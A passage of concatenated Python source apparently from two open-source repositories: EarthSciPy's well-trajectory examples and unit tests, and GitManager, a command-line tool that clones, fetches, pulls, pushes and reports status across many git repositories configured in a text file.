print ( 'X %+5d Y %+5d Z %+5d' % ( i.wellhead.X, i.wellhead.Y, i.wellhead.Z ) )
print( '</td>' )
print( '<td>' )
print ( 'well_length %d' % ( i.well_length ) )
#print('\nprint out the geometry data for well', i.wellname )
print('</td>')
print( '<td>' )
print('<table border="1">')
print('<tr><th>Inclination</th><th>Vertical</th><th>Targent</th><th>Start length</th><th>End point X Y Z </th></tr>')
for s in i.geometry:
print('<tr>')
print('<td>')
print('%.1f' % ( s.inclination ) )
print('</td>')
print( '<td>%.2f.</td>' % ( s.vertical ) )
print( '<td>%.2f.</td>' % ( s.tangent ) )
print( '<td>%.2f.</td>' % ( s.start_length ) )
print( '<td>%.2f, %.2f, %.2f</td>' % ( s.end_dot.X, s.end_dot.Y, s.end_dot.Z ) )
print('</tr>')
print('</table>')
print( '</td>' )
print('</tr>')
print( '</table>' )
print ( '<p>field size top (X %d Y %d Z %d) bottom (X %d Y %d Z %d)' % ( wf.topleft.X, wf.topleft.Y, wf.topleft.Z, wf.bottomright.X, wf.bottomright.Y, wf.bottomright.Z ), '</p>' )
print("\nEnd")
--- FILE SEPARATOR ---
from earthscipy.wells import *
def Create_WellField_North():
# Create well field
WF = WellField( "North" )
# add some well to field
WF.add_well( Well( 'N_well#1', 11, -7 ) )
WF.add_well( Well( 'N_well#3', 1, 1 ) )
WF.add_well( Well( 'N_well#4', 100, 100, -2 ) )
w = Well( 'N_well#5', 0, 0 )
w.add_geometry_step( 10, 0 )
w.add_geometry_step( 10, 45 )
w.add_geometry_step( 10, 90 )
w.add_geometry_step( 100, 0 )
WF.add_well( w )
WF.add_well( Well( 'N_well#6', -99, 88, 1 ) )
w1 = Well( 'N_well#9', -100, -100 )
w1.add_geometry_step( 1, 0 )
WF.add_well( w1 )
return WF
def Create_WellField_South():
WF = WellField("South")
WF.add_well( Well( 'S_well#1', 11, -7 ) )
return WF
--- FILE SEPARATOR ---
from setuptools import setup
setup(name='earthscipy',
version='0.0.0',
description='Earth science lib',
url='https://github.com/postpdm/EarthSciPy',
author='YN.Coder',
author_email='yn.coder@gmail.com',
license='-',
packages=['earthscipy'],
zip_safe=False)
--- FILE SEPARATOR ---
# tests for EarthSciPy
--- FILE SEPARATOR ---
from earthscipy.wells import *
from unittest import TestCase
from math import fabs, sqrt
# We do not much care about trigonometry precision. Underground measurements is not so accurate
PERMISSIBLE_VARIATION_VALUE = 0.000001
PERMISSIBLE_VARIATION_VALUE_ROUGH = 0.01
class WellField_Test(TestCase):
def test_StaticDot3D(self):
s = StaticDot3D( 1, 2, 3 )
self.assertEqual( s.X, 1 )
self.assertEqual( s.Y, 2 )
self.assertEqual( s.Z, 3 )
def test_WellGeometryStepX_0( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10 )
self.assertEqual( WGS.end_dot.X, 10 )
def test_WellGeometryStepY_0( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10 )
self.assertEqual( WGS.end_dot.Y, 0 )
def test_WellGeometryStepZ_0( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10 )
self.assertEqual( WGS.end_dot.Z, 0 )
def test_WellGeometryStepX_45( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 45 )
self.assertTrue( fabs( fabs( WGS.end_dot.X ) - 7.0710687 ) < PERMISSIBLE_VARIATION_VALUE )
def test_WellGeometryStepY_45( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 45 )
self.assertTrue( fabs( fabs( WGS.end_dot.Y ) - 7.0710687 ) < PERMISSIBLE_VARIATION_VALUE )
def test_WellGeometryStepZ_45( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 45 )
self.assertEqual( WGS.end_dot.Z, 0 )
def test_WellGeometryStepX_90( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 90 )
self.assertTrue( fabs( WGS.end_dot.X ) < PERMISSIBLE_VARIATION_VALUE )
def test_WellGeometryStepY_90( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 90 )
self.assertEqual( WGS.end_dot.Y, 10 )
def test_WellGeometryStepZ_90( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 90 )
self.assertEqual( WGS.end_dot.Z, 0 )
def test_WellGeometryStepX_5_2( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 5, 2 )
self.assertTrue( fabs( fabs( WGS.end_dot.X ) - 9.955878 ) < PERMISSIBLE_VARIATION_VALUE )
def test_WellGeometryStepY_5_2( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 5, 2 )
self.assertTrue( fabs( fabs( WGS.end_dot.Y ) - 0.871026 ) < PERMISSIBLE_VARIATION_VALUE )
def test_WellGeometryStepZ_5_2( self ):
WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 5, 2 )
self.assertTrue( fabs( fabs( WGS.end_dot.Z ) - 0.348994 ) < PERMISSIBLE_VARIATION_VALUE )
def test_well_coordinates(self):
WF = WellField("_")
WF.add_well( Well( 'well#1', 11, -7 ) )
WF.add_well( Well( 'well#2', -99, 88, 1 ) )
WF.add_well( Well( 'well#3', 1, 1 ) )
WF.add_well( Well( 'well#4', 100, 100, -2 ) )
self.assertEqual( WF.topleft.X, -99)
self.assertEqual( WF.topleft.Y, -7)
self.assertEqual( WF.topleft.Z, -2)
self.assertEqual( WF.bottomright.X, 100)
self.assertEqual( WF.bottomright.Y, 100)
self.assertEqual( WF.bottomright.Z, 1)
def test_well_field_mutable(self):
# WellField contain mutable lists. Test it's not shared
WF_1 = WellField("1")
WF_2 = WellField("2")
WF_1.add_well( Well( 'well#1', 0, 0 ) )
self.assertEqual( len( WF_1.Well_list ), 1 ) # because we has add well to a first field
self.assertEqual( len( WF_2.Well_list ), 0 ) # because we hasn't add well to a second field
def test_well_mutable(self):
# Well contain mutable lists. Test it's not shared
W_1 = Well("well#1", 0, 0 )
W_2 = Well("well#2", 0, 0)
W_1.add_geometry_step( 10 )
self.assertEqual( len( W_1.geometry ), 1 ) # because we has add inclinometry step to a first well
self.assertEqual( len( W_2.geometry ), 0 ) # because we hasn't add inclinometry step to a second well
def test_well_inclination(self):
W = Well( 'test well', 1, 1, 1 )
self.assertEqual( W.well_length, 0 )
W.add_geometry_step( 10 )
self.assertEqual( W.well_length, 10 )
W.add_geometry_step( 10 )
self.assertEqual( W.well_length, 20 )
W.add_geometry_step( 12 )
self.assertEqual( W.well_length, 32 )
W.add_geometry_step( 12 )
self.assertEqual( W.well_length, 44 )
self.assertEqual( W.geometry[-1].start_length, 32 )
def test_well_inclination_circle_X(self):
# ths couldn't be in real life
W1 = Well( 'test well', 0, 0, 0 )
W1.add_geometry_step( 10, 0, 0 )
W1.add_geometry_step( 10, 90, 0 )
W1.add_geometry_step( 10, 180, 0 )
W1.add_geometry_step( 10, 270, 0 )
self.assertEqual( W1.well_length, 40 )
self.assertTrue( fabs( W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE )
def test_well_inclination_circle_XY(self):
# ths couldn't be in real life
W1 = Well( 'test well', 0, 0, 0 )
W1.add_geometry_step( 10, 0, 0 )
W1.add_geometry_step( 10, 90, 0 )
W1.add_geometry_step( 10, 180, 0 )
W1.add_geometry_step( 10, 270, 0 )
self.assertEqual( W1.well_length, 40 )
self.assertTrue( fabs( W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE )
self.assertTrue( fabs( W1.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE )
def test_well_inclination_50steps(self):
W1 = Well( 'test well', 0, 0, 0 )
for i in range(0, 50):
W1.add_geometry_step( 10, 11, -7 )
W1.add_geometry_step( 10, -11, 7 )
self.assertEqual( W1.End_Dot().Y, 0 )
self.assertEqual( W1.End_Dot().Z, 0 )
self.assertTrue( W1.End_Dot().X < W1.well_length )
self.assertEqual( W1.well_length, 1000 )
def test_well_inclination_drill_small_cube(self):
W1 = Well( 'test well 1', 0, 0, 0 )
W1.add_geometry_step( sqrt(3), 45, 35.5 ) # it sould be a cube with 1m edges
self.assertTrue( fabs( 1 - W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
self.assertTrue( fabs( 1 - W1.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
self.assertTrue( fabs( 1 - W1.End_Dot().Z ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
self.assertEqual( sqrt( ( W1.End_Dot().X * W1.End_Dot().X ) + ( W1.End_Dot().Y * W1.End_Dot().Y ) + ( W1.End_Dot().Z * W1.End_Dot().Z ) ), sqrt(3) )
def test_well_inclination_drill_small_cuboid(self):
W1 = Well( 'test well 1', 0, 0, 0 )
W1.add_geometry_step( sqrt(1+4+9), 56.309932474, 15.5013595669 ) # it sould be a cuboid with 1-2-3m edges
self.assertTrue( fabs( 2 - W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
self.assertTrue( fabs( 3 - W1.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
self.assertTrue( fabs( 1 - W1.End_Dot().Z ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
self.assertTrue( fabs( sqrt( ( W1.End_Dot().X * W1.End_Dot().X ) + ( W1.End_Dot().Y * W1.End_Dot().Y ) + ( W1.End_Dot().Z * W1.End_Dot().Z ) ) - sqrt(1+4+9) ) < PERMISSIBLE_VARIATION_VALUE )
def test_well_inclination_drill_big_cube(self):
W1 = Well( 'test well 1', 0, 0, 0 )
W1.add_geometry_step( 1000, 17, 9 )
W2 = Well( 'test well 2', 0, 0, 0 )
for i in range(0, 100):
W2.add_geometry_step( 10, 17, 9 )
self.assertTrue( fabs( W1.End_Dot().X - W2.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE )
self.assertTrue( fabs( W1.End_Dot().Y - W2.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE )
self.assertTrue( fabs( W1.End_Dot().Z - W2.End_Dot().Z ) < PERMISSIBLE_VARIATION_VALUE )
|
[
"/earthscipy/__init__.py",
"/earthscipy/wells.py",
"/examples/wells_example.py",
"/examples/wells_example_HTML.py",
"/examples/wells_example_data.py",
"/setup.py",
"/tests/__init__.py",
"/tests/wells_tests.py"
] |
00mjk/GitManager
|
#!/usr/bin/env python
import sys
from GitManager import main
if __name__ == '__main__':
code = main.main(sys.argv)
sys.exit(code)
--- FILE SEPARATOR ---
from typing import List
import typing
from ..utils import format
from ..repo import description
class Command(object):
""" Flag indicating if this command is a plain command, that is not
fancy lines will be used. """
PLAIN = False
LOCAL = False
FILTER = False
def __init__(self, line: format.TerminalLine,
repos: List[description.RepositoryDescription],
*args: str):
self.__line = line
self.__repos = repos
self.__args = self.parse(*args)
# current state when running this command
self.__idx = None
self.__repo = None
def parse(self, *args: str) -> typing.Any:
""" Parses arguments given to this Command """
# if we support filtering, set the filter
if self.__class__.FILTER and len(args) > 0:
self.__repos = list(
filter(lambda d: d.remote.matches(args[0]), self.__repos))
@property
def args(self) -> typing.Any:
""" Arguments passed to this instance"""
return self.__args
@property
def repos(self) -> List[description.RepositoryDescription]:
""" A list of repositories subject to this command. """
# if we are a local command, we only use local repositories
if self.__class__.LOCAL:
return list(filter(lambda ds: ds.local.exists(), self.__repos))
# else we return all the repositories
else:
return list(self.__repos)
@property
def line(self) -> format.TerminalLine:
return self.__line
def run(self, repo: description.RepositoryDescription) \
-> bool:
""" Runs this Command on a given repository """
raise NotImplementedError
def write(self, message: typing.Any):
""" Writes text from this command. """
self.line.linebreak()
print(message)
def write_with_counter(self, message: str):
""" Writes a message together with a counter into the line """
# repo count and number of zeros for it
repo_count = len(self.repos)
zcount = len(str(repo_count))
# the prefix - a counter
prefix = "[{}/{}] ".format(
str(self.__idx + 1).zfill(zcount),
repo_count,
)
self.line.write("{}{}".format(prefix, message))
def write_path_with_counter(self, path: str):
""" Writes a path with a counter"""
# repo count and number of zeros for it
repo_count = len(self.repos)
zcount = len(str(repo_count))
# the prefix - a counter
prefix = "[{}/{}] ".format(
str(self.__idx + 1).zfill(zcount),
repo_count,
)
# and write the message to the output
message = format.Format.short_path(path, self.line.width - len(prefix))
self.write_with_counter(message)
def __call__(self, *args: str) -> int:
""" Runs this command on a set of repositories """
counter = 0
for (i, repo) in enumerate(self.repos):
self.__idx = i
self.__repo = repo
if not self.__class__.PLAIN:
self.write_path_with_counter(repo.local.path)
if self.run(repo):
counter += 1
self.line.clean()
return counter
--- FILE SEPARATOR ---
from GitManager.utils import format
from GitManager.config import file
from GitManager.repo import implementation, description
import os
import argparse
class Clone(object):
""" A command to clone and optionally save a repository """
def __init__(self, line: format.TerminalLine, config: file.File,
*commandargs):
self.config = config
self.line = line
parser = argparse.ArgumentParser('Clones a repository as '
'configured in the config '
'file. ')
parser.add_argument('--save', action='store_true', default=False)
parser.add_argument('url', help='URL to clone')
parser.add_argument('arguments', nargs=argparse.REMAINDER,
help='Extra arguments to pass to git clone '
'command. ')
self.args = parser.parse_args(commandargs)
def url_to_description(self, url: str) \
-> description.RepositoryDescription:
""" Turns a URL into a repository description """
remote = implementation.RemoteRepository(url)
local = implementation.LocalRepository(
os.path.join(self.config.root, *remote.components()))
return description.RepositoryDescription(remote.url, local.path)
def __call__(self):
# get the path to clone into
desc = self.url_to_description(self.args.url)
if desc.local.exists():
self.line.write('Repository already exists, nothing to clone. ')
return
# if requested, save it
if self.args.save:
self.config.insert_repo_or_get(desc)
self.config.write()
desc.remote.clone(desc.local, *self.args.arguments)
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class Fetch(Command):
""" Fetch all remotes for all repositories """
LOCAL = True
FILTER = True
def run(self, repo: description.RepositoryDescription) -> bool:
if not repo.local.exists():
return False
return repo.local.fetch()
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class GC(Command):
""" Runs house keeping tasks with parameters """
LOCAL = True
FILTER = True
def parse(self, *args: str) -> typing.Any:
""" Parses arguments given to this Command """
if len(args) > 0 and not args[0].startswith('-'):
super(GC, self).parse(args[0])
self.__args = args[1:]
else:
self.__args = args
def run(self, repo: description.RepositoryDescription) -> bool:
if not repo.local.exists():
return False
self.line.linebreak()
return repo.local.gc(*self.__args)
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class LsLocal(Command):
""" Lists all local commands """
PLAIN = True
LOCAL = True
FILTER = True
def run(self, repo: description.RepositoryDescription) -> bool:
if repo.local.exists():
print(repo.local.path)
return True
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class Pull(Command):
""" Pulls a repository """
LOCAL = True
FILTER = True
def run(self, repo: description.RepositoryDescription) -> bool:
if not repo.local.exists():
return False
self.line.linebreak()
return repo.local.pull()
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class Push(Command):
""" Pushes a repository """
LOCAL = True
FILTER = True
def run(self, repo: description.RepositoryDescription) -> bool:
if not repo.local.exists():
return False
self.line.linebreak()
return repo.local.push()
--- FILE SEPARATOR ---
import typing
import argparse
from ..config import file
from ..repo import finder
from ..repo.implementation import LocalRepository
from ..utils import format
import os
import sys
class Reconfigure(object):
""" Reconfigure the configuration file"""
def __init__(self, line: format.TerminalLine, f: file.File, *args: str):
self.file = f
self.line = line
self.args = self.parse(*args)
def parse(self, *args: str) -> typing.Any:
""" Parses arguments given to this Command """
parser = argparse.ArgumentParser(prog='git-manager reconfigure',
description='Recursively add '
'repositories to the '
'configuration file')
parser.add_argument('--simulate', '-s', dest='simulate',
action='store_true', default=False,
help='Instead of writing out the configuration '
'file to disk, print it to STDOUT. ')
parser.add_argument('--rebuild', '-re', dest='rebuild',
action='store_true', default=False,
help='Rebuild and clean up the configuration '
'file, removing empty groups. ')
parser.add_argument('--remove', '-rm', dest='remove',
nargs='*',
help='Remove directories from config file '
'provided they exist. ')
parser.add_argument('--clear', '-c', dest='clear',
action='store_true', default=False,
help='Clear all existing repositories from the '
'configuration. ')
parser.add_argument('--follow-symlinks', '-f', dest='follow_symlinks',
action='store_true', default=False,
help='When looking for repositories to add, '
'automatically follow symlinks. Use with '
'caution, as there are no checks for '
'circularity. ')
parser.add_argument('--allow-subrepositories', '-a',
dest='allow_subrepositories',
action='store_true', default=False,
help='When looking for repositories to add, '
'keep searching within folders of existing '
'repositories. ')
parser.add_argument('path', nargs='?', default=None,
help='Rebuild and clean up the configuration '
'file, removing empty groups. ')
return parser.parse_args(args)
def __call__(self):
# if no paths are given, use the current path
if not self.args.rebuild and \
self.args.path is None and \
not self.args.remove:
self.args.path = os.getcwd()
# remove all the locally given repositories
if self.args.remove:
for path in self.args.remove:
success = self.file.remove_local(LocalRepository(path))
if not self.args.simulate:
if success:
self.line.write('Removed {}'.format(path))
else:
self.line.write('Not Found: {}'.format(path))
self.line.linebreak()
# clear the existing list if asked
if self.args.clear:
self.file.lines = []
if self.args.path is not None:
# find repositories in the given path add them
for desc in finder.Finder.find_recursive(
self.args.path,
allow_links=self.args.follow_symlinks,
continue_in_repository=self.args.allow_subrepositories,
callback=lambda s: self.line.write(
format.Format.short_path(s, self.line.width))
):
if not self.args.simulate:
self.line.linebreak()
# print if we found a new repository
if not self.file.contains(desc):
self.line.write(desc.path)
self.line.linebreak()
self.line.write(" {}".format(desc.source))
self.line.linebreak()
self.file.insert_repo_or_get(desc)
# if the rebuild flag is set, rebuild all the repos
if self.args.rebuild:
self.file.rebuild()
if self.args.simulate:
for line in self.file.lines:
print(line.write())
else:
self.file.write()
--- FILE SEPARATOR ---
import typing
import argparse
from ..repo import description
from ..repo import implementation
from ..utils import format
from . import Command
class State(Command):
""" Checks the state of all repositories, and list all those out-of-date"""
LOCAL = True
FILTER = True
def parse(self, *args: str) -> typing.Any:
""" Parses arguments given to this Command """
parser = argparse.ArgumentParser(prog='git-manager state')
parser.add_argument('pattern', nargs='?')
group = parser.add_mutually_exclusive_group()
group.add_argument('--update', dest='update',
action='store_true', default=True,
help='Update remote references using \'git '
'remote update\' before showing status. '
'Enabled by default. ')
group.add_argument('--no-update', dest='update',
action='store_false',
help='DO NOT update remote references using '
'\'git remote update\' '
'before showing status. ')
targs = parser.parse_args(args)
if targs.pattern:
super(State, self).parse(targs.pattern)
return targs
def run(self, repo: description.RepositoryDescription) -> bool:
if not repo.local.exists():
return False
status = repo.local.remote_status(self.args.update)
if status == implementation.RemoteStatus.REMOTE_NEWER:
self.line.linebreak()
print(format.Format.yellow('Upstream is ahead of your branch, '
'pull required. '))
elif status == implementation.RemoteStatus.LOCAL_NEWER:
self.line.linebreak()
print(format.Format.green('Your branch is ahead of upstream, '
'push required.'))
elif status == implementation.RemoteStatus.DIVERGENCE:
self.line.linebreak()
print(format.Format.red('Your branch and upstream have diverged, '
'merge or rebase required. '))
return status == implementation.RemoteStatus.UP_TO_DATE
--- FILE SEPARATOR ---
import typing
from ..repo import description
from ..utils import run
from . import Command
class Status(Command):
""" Checks that status of all repositories """
LOCAL = True
FILTER = True
def run(self, repo: description.RepositoryDescription) -> bool:
if not repo.local.exists():
return False
status = repo.local.local_status()
if status is not None and status != '':
self.line.linebreak()
run.GitRun("status", cwd=repo.local.path, pipe_stdout=True).wait()
return status == ''
--- FILE SEPARATOR ---
import typing
import os.path
from . import line, tree
class File(tree.Tree):
""" Methods for parsing and reading configuration file. """
def __init__(self, fn: str):
""" Creates a new File object"""
super().__init__()
self.__fn = fn
def read(self):
""" Re-reads the lines currently contained in this file """
with open(self.__fn, "r") as fp:
self.lines = [line.ConfigLine.parse(l.rstrip('\n')) for l in
fp.readlines()]
def write(self):
""" Writes the lines currently contained in this file to disk """
with open(self.__fn, "w") as fp:
for l in self.lines:
fp.write("{}\n".format(l.write()))
@staticmethod
def find() -> typing.Optional[str]:
"""finds the location of the configuration file"""
# 1. Check $GIT_MANAGER_CONFIG if set
if "GIT_MANAGER_CONFIG" in os.environ:
git_manager_config = os.environ["GIT_MANAGER_CONFIG"]
if os.path.isfile(git_manager_config):
return git_manager_config
# 2. ~/.config/.gitmanager/config
# (or $XDG_CONFIG_HOME/.gitmanager/config if set)
if "XDG_CONFIG_HOME" in os.environ:
xdg_config_home = os.environ["XDG_CONFIG_HOME"]
else:
xdg_config_home = os.path.join(os.path.expanduser("~"), ".config")
xdg_config_path = os.path.join(xdg_config_home, ".gitmanager",
"config")
if os.path.isfile(xdg_config_path):
return xdg_config_path
# 3. ~/.gitmanager
fallback_path = os.path.join(os.path.expanduser("~"), ".gitmanager")
if os.path.isfile(fallback_path):
return fallback_path
__all__ = ["File"]
--- FILE SEPARATOR ---
import re
import typing
class ConfigLine(object):
""" A single line in the configuration file """
DIRECTIVE_ROOT = re.compile(r'^(\s*)##(\s*)([^\s]+)(\s*)$')
DIRECTIVE_NOP = re.compile(r'^((\s*)#(.*))|(\s*)$')
DIRECTIVE_BASE = re.compile(
r'(\s*)(>+)(\s+)([^\s]+)(\s*)$')
DIRECTIVE_REPO = re.compile(r'^(\s*)([^>\s]+)(?:(\s+)([^\s]+))?(\s*)$')
def __init__(self, indent: str):
""" Creates a new ConfigLine object
:param indent: The indent of this ConfigLine Line
"""
self.__indent = indent
def __repr__(self):
return "{}({})".format(self.__class__.__name__, repr(self.write()))
@property
def indent(self) -> str:
return self.__indent
def write(self) -> str:
""" Turns this ConfigLine into a string that can be re-parsed """
raise NotImplementedError
@staticmethod
def parse(s: str):
""" Parses a string into a ConfigLine
:rtype: ConfigLine"""
root_match = ConfigLine.DIRECTIVE_ROOT.match(s)
if root_match:
return RootLine(root_match.group(1), root_match.group(2),
root_match.group(3), root_match.group(4))
nop_match = ConfigLine.DIRECTIVE_NOP.match(s)
if nop_match:
return NOPLine(s)
base_match = ConfigLine.DIRECTIVE_BASE.match(s)
if base_match:
return BaseLine(base_match.group(1), len(base_match.group(2)),
base_match.group(3), base_match.group(4),
base_match.group(5) or '')
repo_match = ConfigLine.DIRECTIVE_REPO.match(s)
if repo_match:
return RepoLine(repo_match.group(1), repo_match.group(2),
repo_match.group(3) or '',
repo_match.group(4) or '',
repo_match.group(5))
raise ValueError("Input does not represent a ConfigLine")
class NOPLine(ConfigLine):
""" A line without meaning inside the Configuration File """
def __init__(self, line: str):
""" Creates a new NopLine instance """
super().__init__('')
self.__line = line
@property
def content(self) -> str:
""" The content of this line """
return self.__line
def write(self) -> str:
""" Turns this ConfigLine into a string that can be re-parsed """
return self.__line
def __eq__(self, other: typing.Any) -> bool:
""" Checks that this line is equal to another line """
return isinstance(other, NOPLine) and self.content == other.content
class RootLine(ConfigLine):
""" A line defining the root of all repositories """
def __init__(self, indent: str, space_1: str, root: str, space_2: str):
super().__init__(indent)
self.__space_1 = space_1
self.__root = root
self.__space_2 = space_2
@property
def root(self) -> str:
""" The root path being set """
return self.__root
def write(self) -> str:
""" Turns this ConfigLine into a string that can be re-parsed """
return "{}##{}{}{}".format(self.indent, self.__space_1, self.root,
self.__space_2)
def __eq__(self, other: typing.Any) -> bool:
""" Checks that this line is equal to another line """
if isinstance(other, RootLine):
return self.indent == other.indent and \
self.root == other.root and \
self.__space_1 == other.__space_1 and \
self.__space_2 == other.__space_2
return False
class BaseLine(ConfigLine):
""" A line introducing a new BaseLine """
def __init__(self, indent: str, depth: int, space_1: str, path: str,
space_2: str):
""" Creates a new BaseLine instance """
super().__init__(indent)
self.__depth = depth
self.__space_1 = space_1
self.__path = path
self.__space_2 = space_2
@property
def depth(self) -> int:
""" The depth of this BaseLine directive """
return self.__depth
@property
def path(self) -> str:
""" The path this BaseLine instance introduces """
return self.__path
def write(self) -> str:
""" Turns this ConfigLine into a string that can be re-parsed """
return "{}{}{}{}{}".format(self.indent, ">" * self.depth,
self.__space_1, self.path,
self.__space_2)
def __eq__(self, other: typing.Any) -> bool:
""" Checks that this line is equal to another line """
if isinstance(other, BaseLine):
return self.indent == other.indent and \
self.depth == other.depth and \
self.__space_1 == other.__space_1 and \
self.path == other.path and \
self.__space_2 == other.__space_2
return False
class RepoLine(ConfigLine):
""" a line representing a single repository """
def __init__(self, indent: str, url: str, space_1: str, path: str,
space_2: str):
""" Creates a new RepoLine instance """
super().__init__(indent)
self.__url = url
self.__space_1 = space_1
self.__path = path
self.__space_2 = space_2
@property
def url(self) -> str:
""" The url this repo should be cloned from """
return self.__url
@property
def path(self) -> str:
""" The path this repo should be cloned into """
return self.__path
def write(self) -> str:
""" Turns this ConfigLine into a string that can be re-parsed """
return "{}{}{}{}{}".format(self.indent, self.url, self.__space_1,
self.path, self.__space_2)
def __eq__(self, other: typing.Any) -> bool:
""" Checks that this line is equal to another line """
if isinstance(other, RepoLine):
return self.indent == other.indent and \
self.url == other.url and \
self.__space_1 == other.__space_1 and \
self.path == other.path and \
self.__space_2 == other.__space_2
return False
--- FILE SEPARATOR ---
import typing
import os
from . import line
from ..repo import description as desc
from ..repo import implementation as impl
class Tree(object):
""" Represents a Tree of Repositories """
def __init__(self):
""" Creates a new Tree object"""
self.__lines = []
self.__base_directory = os.path.expanduser('~').rstrip("/")
self.__root = self.__base_directory
@property
def lines(self) -> typing.List[line.ConfigLine]:
""" the lines currently contained in this File """
return self.__lines
@property
def descriptions(self) -> \
typing.Generator[typing.Tuple[int, desc.Description], None, None]:
""" an iterator for pairs of (line, description) """
# A stack for repo folders
path_stack = [self.__base_directory]
for (i, l) in enumerate(self.lines):
if isinstance(l, line.BaseLine):
# extract the current and new order of the lines
current_order = len(path_stack)
new_order = l.depth
# we can not have a new order lower than 1 depth of the
# current level
if new_order > current_order:
raise Exception(
'Error in line {}: Missing base sublevel. '.format(
i + 1))
# Read the sub-directory to be added and the old one
sub_dir = os.path.expanduser(l.path)
previous_item = path_stack[new_order - 1]
# add the new sub-directory
new_sub_dir = os.path.join(previous_item, sub_dir)
path_stack[new_order:] = [new_sub_dir]
# and yield it
yield i, desc.BaseDescription(new_sub_dir)
if isinstance(l, line.RepoLine):
# Extract the base directory and the source url
stack_loc = path_stack[-1]
source_uri = l.url
# And the path to clone to
folder = os.path.expanduser(l.path) or None
path = os.path.join(stack_loc, folder) \
if folder is not None else None
name = path if path is not None else \
impl.RemoteRepository(source_uri).humanish_part()
# and yield the actual repository
yield i, desc.RepositoryDescription(
source_uri, os.path.join(stack_loc, name))
@property
def repositories(self) -> typing.Generator[desc.RepositoryDescription,
None, None]:
""" an iterator for all repositories """
for (i, d) in self.descriptions:
if isinstance(d, desc.RepositoryDescription):
yield d
@property
def locals(self) -> typing.Generator[impl.LocalRepository, None,
None]:
""" an iterator for all localrepositories """
for rd in self.repositories:
yield rd.local
@lines.setter
def lines(self, ll: typing.List[line.ConfigLine]):
""" sets the lines to be contained in this file """
for l in ll:
if isinstance(l, line.RootLine):
self.__root = os.path.join(self.__base_directory, l.root)
break
self.__lines = ll
@property
def root(self) -> str:
""" The root of this repository"""
return self.__root
def index(self, d: desc.Description) -> typing.Optional[int]:
""" Finds the index of a specific description inside of this Tree"""
for (i, dd) in self.descriptions:
if dd == d:
return i
return None
def contains(self, d: desc.Description) -> bool:
""" Checks if this repository contains a specific description """
return self.index(d) is not None
def insert_at(self, parent: typing.Optional[desc.BaseDescription],
d: desc.Description) -> int:
""" Inserts a description at a given parent
:param parent: Parent item to insert description at. If omitted,
insert the item top-level
:param d: Repository to insert
"""
# are we inserting a base?
insert_base = isinstance(d, desc.BaseDescription)
# find the index to insert in
# in the empty case, start at the top
if parent is None:
index = 0
pdepth = 0
indent = " "
else:
index = self.index(parent)
if index is None:
raise ValueError("Parent does not exist in Tree()")
pdepth = self.lines[index].depth
indent = self.lines[index].indent + " "
index += 1
# index to insert into
insert_index = 0
# A stack for repository patchs
path_stack = [self.__base_directory]
target_level = None
# iterate through the lines
# and find the last line
for (i, l) in enumerate(self.lines):
# only do thing for indexes below index
if i >= index:
# if we have a base line we might have to quit
if isinstance(l, line.BaseLine):
# if we are not inserting a base, break
if not insert_base:
break
# if we do not know our target level yet, we need to
# find it
if target_level is None:
target_level = len(path_stack)
# we need to break upon our target level
if l.depth < target_level:
break
# if we have a repo line and have not reached our target
# level, we can save the indent
if isinstance(l, line.RepoLine) and target_level is None:
indent = l.indent
# else we might need to update our path
elif isinstance(l, line.BaseLine):
# extract the current and new order of the lines
current_order = len(path_stack)
new_order = l.depth
# we can not have a new order lower than 1 depth of the
# current level
if new_order > current_order:
raise Exception(
'Error in line {}: Missing base sublevel. '.format(
i + 1))
# Read the sub-directory to be added and the old one
sub_dir = os.path.expanduser(l.path)
previous_item = path_stack[new_order - 1]
# add the new sub-directory
new_sub_dir = os.path.join(previous_item, sub_dir)
path_stack[new_order:] = [new_sub_dir]
# and up the index to insert into
insert_index = i + 1
# the parent path is the path that is at the right most position
ppath = path_stack[-1]
# if we are inserting a repository, create an appropriate repo line
if not insert_base:
(base, item) = d.to_repo_line(indent, " ", "")
if base.folder != ppath.rstrip("/"):
raise ValueError("Cannot insert: Invalid Parent for "
"RepositoryDescription. ")
# if we are inserting a base description, we need to figure out paths
else:
npath = os.path.relpath(d.folder, ppath)
if (npath == '..' or npath.startswith('../')):
npath = d.folder
item = line.BaseLine(indent, pdepth + 1, " ", npath, "")
# finally insert the item itself
self.__lines.insert(insert_index, item)
# and return the inserted index
return insert_index
def insert_base_or_get(self, b: desc.BaseDescription) -> int:
""" Gets a BaseDescription index or inserts it recursively """
# if we have the parent already, we are done
index = self.index(b)
if index is not None:
return index
# if we are inside of the base path, we can go recursively
if os.path.commonprefix([b.folder, self.__base_directory]) == \
self.__base_directory:
# find the parent base description
(ppath, _) = os.path.split(b.folder)
# if we have reached the base, we do not need to create anything
if ppath != self.__base_directory \
and b.folder != self.__base_directory:
parent = desc.BaseDescription(ppath)
# and create the parent
